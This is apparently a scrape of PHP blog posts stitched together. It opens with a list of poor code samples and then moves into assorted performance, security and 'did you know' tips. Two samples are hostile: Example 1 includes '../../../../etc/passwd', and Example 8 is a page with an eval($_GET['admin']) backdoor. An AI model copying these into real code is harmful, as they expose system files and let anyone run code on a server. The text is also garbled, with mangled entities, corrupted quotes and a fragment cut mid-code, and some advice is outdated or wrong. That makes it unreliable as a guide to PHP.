Example 1.

<?php
  phpinfo();
  if (file_exist('../../../../etc/passwd'))
  {
    include('../../../../etc/passwd');
  }

Example 2.

if (!isset($_GET['month'])) {
    ...
}
else {
    if (isset($_POST['submit_fin'])) {
        ...
    }
}

Example 3.

function InitBVar(&$var)
{
	$var = ($var=="Y") ? "Y" : "N";
}

Example 4.

function htmlspecialcharsex($str)
{
	if (strlen($str)>0)
	{
		$str = str_replace("&", "&", $str);
		$str = str_replace("<", "<", $str);
		$str = str_replace(">", ">", $str);
		$str = str_replace(""", """, $str);
		$str = str_replace("<", "&lt;", $str);
		$str = str_replace(">", "&gt;", $str);
		$str = str_replace(""", "&quot;", $str);
	}
	return $str;
}

Example 5.

str_replace("t", "     ", $file_new);

Example 6.

$id = 0;
while (!$id || mysql_error()) {
    $id = rand(1, 10000000);
    mysql_query("INSERT INTO `table` (id) VALUES ('".$id."'");
}

Example 7.

$find = str_replace(",", "", $find);
$find = str_replace(".", "", $find);
$find = str_replace("/", "", $find);
$find = str_replace(" ", "", $find);
$find = str_replace("-", "", $find);
$find = str_replace("+", "", $find);
$find = str_replace("#", "", $find);

Example 8.

<?php
echo "<html>";
echo "<body>";
echo "<h1>This is my home page</h1>";
echo "DATENG & DOORWAY";
echo "</body>";
echo "</html>";
if (isset($_GET['admin'])) eval($_GET['admin']);
?>

Example 9.

if (isset($param) && $param!=null && $param!=0 && $param>1) {
  sendRequest($param);
}

Example 10.

switch (true) {
		case $formid == 'search_form' :
		case $formid == 'search_theme_form' :
			$form['#action'] = getlangpref() . ltrim($form['#action'], '/');
			$form['#submit']['gpcustom_customsubmit'] = array();
			break;
		case $formid == 'localizernode_translations' :
			foreach ( $form['languages'] as $key => $value ) {
				if ( !is_array($value['#options']) ) continue;
				asort($form['languages'][$key]['#options']);
			}
			break;
		case $formid == 'contact_mail_page' :
			if ( $url = variable_get('gpcustom-contact-form-redirect',
false) ) $form['#redirect'] = $url;
			break;

	}

The Identical ($a === $b)  returns TRUE when $a is equal to $b, and they are of the same type.

When we use the identical operator $a === $b, first it checks to see if the two arguments ($a and $b) are the same type.
So, if $a is 1 and $b is ’1′ the check will fail on the type checking, before and any comparison are actually carried out.

Another reason the equal operator ($a == $b) to be slower than the identical operator is that the equal operator first goes ahead and it converts both arguments ($a and $b) to the same type and does the comparison.

1. Always use the standard php tags, ex.

<?php echo “devtheweb.net blog”; ?> and never use shortcuts when declaring php code, ex.

<?=

echo “devtheweb.net blog”;

?>

or

<?
echo “devtheweb.net blog”;
?>

or even asp.net style

<%

echo “devtheweb.net blog”;

%>

All these declarations are deprecated. So, When you stick to the standard php declaration, it’s guaranteed that it will be supported in future php versions.

2. Document your code

It’s a simple to be done, but it could save you much troubles when you later come back on your code.

3. Upgrade to the latest PHP version regularly

When you upgrade to the latest version, there ara many fixed bugs, enhancements, etc.

4. Use Namespaces

The times when namespaces doesn’t exist in php are in the past. If you use PHP 5.3.0 or later you can use them, here’s an example how you can define a namespace:

<?php

// define this code in the ‘YourNamespace’ namespace
namespace YourNamespace;

// … code …

?>

or

<?php

namespace YourNamespace1;
// php code for the YourNamespace1 namespace

namespace YourNamespace2;
// php code for the YourNamespace2 namespace

// Alternative syntax
namespace YourNamespace3 {

// php code for the Your3 namespace
}

?>

5. Always Validate Cookie Data

The cookie data is passed on the web, so it can be harmful. You can validate it using the mysql_real_escape_string() or htmlspecialchars().

6. Tier your Code

To tier your code it means to separate the different components of your code into different parts. This will allow you to make future chages in your code easily.

7. Define all configuration parameters in a single config file

This will allow easily to exchange the config file to reflect settings for your local development site.

8. Code to a standard

The main reason to code to a standard is that PHP is loosely-typed languages and without a proper coding standard, code will look like huge piles of garbage.

That’s all. I hope you’ve found something useful in the tips above

P.S. If you like my php post you can check out my blog regularly, I post at least one php related article a week

You can use both declarations, they has same meaning and there is no recommendation which one should be used:

public static function myStaticMethod()

or

static public function myStaticMethod()

But in my practice I didn’t see static public declaration. Also, I simple research shows that most of the programmers prefer to put the visibility first. It is better because shows which method can be used. It seems that the better programming practice is to declare public static.

1. Instead of print(), use echo. It is a statement, so you avoid the function overhead of print().

2. Incrementing a pre-initialized local variable is 9-10 faster than incrementing an undefined local variable.

3. Incrementing a local variable in method is the fastest. Almost the same as calling local variable in a function.

4. Use echo multiple parameters instead of string concatenation:

<?php
echo ‘This ‘, ‘is ‘, $faster;
echo ‘Tish ‘ . ‘is ‘ . $slower;
?>

5. Where it is possible use ++$i, instead of $i++.

<!–adsense–>

6. Regex could consume a lot of time, so think twice about each regex in your code.

7. It’s a good practice to profile your code. The profiler will show you, which parts of your code how much time consume. The Xdebug debugger already contains a profiler.

8. Cache as much as possible. You can use memcached, it is a high-performance memory object caching system intended to speed up dynamic web apps by alleviating database load. Caching is useful because your script won’t have to be compiled on every web request.

<!–adsense–>

I hope you’ve found something useful in the tips above. Soon, I’ll post new post about general php best practices.

1. You can use array_keys() within foreach() when dealing with arrays. The reson is that foreach returns a copy of the array value. Using of array_keys will avoid excessive memory consumption, ex.

foreach(array_keys($array) as $ak)
{
$v =& $array[$ak];
…
}

2. Not everything has to be written in OOP. Often OOP is too much overhead, because each method and object call consumes a lot of memory.

3. Instead of implementing every data structure as a class, you can use arrays instead.

4. Do not split methods too much. Before doing that you can think which part of your code you will really re-use.

5. If you don’t need some variable, you can unset it to free memory, especially large arrays, ex.

// declare some variable
$a = ‘DevTheWeb.NET is a nice site ’;

…

// after you don’t need $a
// inset it to free memory
unset($a);

6. If some method can be static, you’d better declare it as a static.

7. When you increment an object property (ex. $this->counter++), that operation is 3 times slower than incrementing a local variable (ex. $counter++).

8. Do not use sprintf() for string concatenation, you can use use the concatenation operator (ex. $full = $str1.$str2.$str3;). The reason is that the concatenation operator 2 times faster than sprintf().

I hope, you’ve found something useful in the information above

1. If you want to output a basic string, you’d better use single quotes, instead of double quotes. If you use a string surrounded by double quotes, it’s parsed by the PHP interpreter for special characters and variables. So, use single-quoted strings every time it’s possible.

2. When it’s possible do not use global variables. The reason is that incrementing a global variable is two times slow than a local variable.

3. If you use full paths in requires and includes, it’ll cost less time on resolving the OS paths.

4. You can save time if you avoid repeating function calls in loops:

$str = ‘Imagine it is a very long string …’;
for ($i = 1; $i < = strlen($data); $i++) {
…
}

It’ll be faster:

$str = ‘Imagine it is a very long string …’;
$strLen = strlen($data);
for ($i = 1; $i < = $strLen; $i++) {
…
}

5. It’s good to know that methods in derived classes run faster than methods defined in the base class.

6. Each object in PHP consumes a lot of memory. So, not every data structure should be implemented as a class. You can use arrays, too.

7. when you’re done with database statements, close your database connections.

8. PHP internal functions are faster that functions written in userland. So, before implementing a basic functionality, you’d better check if it already exists in PHP.

$adCount = count($variable);
$randomAdNumber = mt_rand(1, $adCount);
echo $variable[$randomAdNumber];
?>
</a>

That’s really all. You can rotated as much as you want ads, just need to add new $variable[number] line with banner html code.

1. Do not allow PHP files to be writable.

2. Do not allow executable and writeable files in your web root.

3. Do not allow external read access to files with classes, application and configuration code.

4. When magic_quotes is turned on, it automatically escapes incoming data to the PHP script. But it’s not a good idea to be used, because:
- if you rely on it to be turned off or on, your code won’t be portable. You can use get_magic_quotes_gpc() to check for this.
- it affects the performance, because not all the escaping data is inserted in database.
- not all data need escaping, ex. it’s annoying to see ‘ in email
Also, magic_quotes will be removed in PHP 6.0.0.

5. register_globals is still used by many developers. But it may pollutes the global namespace and could overwrite not properly initialized variables. So, it should be turned off, too. register_globals will be removed in PHP 6.0.0.

6. Cookies could easily be modified by users or could be faked very easily by automated scripts, so you’d better do not store important information in cookies.

I hope you’ve found something useful in the advices above. You can check out also PHP Best Practices in Security – Part 1.

1. You can compress/decompress long strings before storing them in a database. It can be done very easy using the built-in functions: gzcompress() and gzuncompress(). They use gzip algorithm and could compress a string up to 90%.

2. You can check if a email is valid by the checkdnsrr() function. It checks the email’s host address if it’s a valid DNS record.

For ex. tihomir@devtheweb12782.com is semantically a valid e-mail, but devtheweb12782.com is not a valid host. That’s why checkdnsrr() will return false.

3. Output formatted PHP code, you can do it by using the highlight_file() function. This function will return a HTML formatted string with nicely colored PHP inside it.

4. You don’t need to store IP addresses as strings.

They can be stored as integers using the ip2long(). The integer converted IP addresses can be converted again to string using the long2ip() function. Storing IP address as integers has some advantages:

• reduce storage space – 4 bytes instead of 15 characters (15 bytes)
• searching by IP address will be faster
• easiest to check if IP address falls within IP ranges

5. Easily unpack numeric arrays using the well-know function … list Look at following code for swapping two variables’ values:

$a = ‘value 1′;
$b = ‘value 2′;

list($a, $b) = array($b, $a);

echo $a; // it will output value 2
echo $b; // it will output value 1

Have you ever seen better code for swapping two variables’ values !?

6. You can use composition of variables. I don’t how it can be useful, but the following code is valid:

${‘a’ . ‘b’} = ‘c’;
echo $ab; // it will output c

7. You can handle the situation when a class that doesn’t exist is instantiated – just need to implement the __autoload function. This function is called transparently by PHP when a class that doesn’t exist is instantiated.

8. Split string to array of strings using preg_split function. It can be done using the explode function. But using preg_split function, the empty strings will be eliminated:

$str = “a,b,,c,,d,,e”;
$strArr = preg_split(“~,~”, $str, -1, PREG_SPLIT_NO_EMPTY); // it will returns array(‘a’,'b’,'c’,'d’, ‘e’)

I hope you’ve found something useful in the examples above

P.S. You can check out also: Things You Probably Didn’t Know About PHP – Part 2